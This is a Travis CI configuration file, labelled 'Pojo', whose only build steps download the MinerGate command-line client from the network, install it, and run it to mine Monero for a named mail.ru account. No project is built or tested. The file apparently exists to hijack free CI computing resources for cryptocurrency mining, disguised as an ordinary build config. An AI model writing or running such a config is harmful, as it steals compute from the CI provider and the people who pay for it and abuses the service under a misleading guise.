# Pojo
language: bash
sudo: false
os:
- linux
script:
  - apt-get update 
  - apt-get -qq --no-install-recommends install ca-certificates wget
  - wget -q --content-disposition https://minergate.com/download/deb-cli
  - dpkg -i *.deb
  - minergate-cli -user filip.uzbekov.2017@mail.ru -xmr


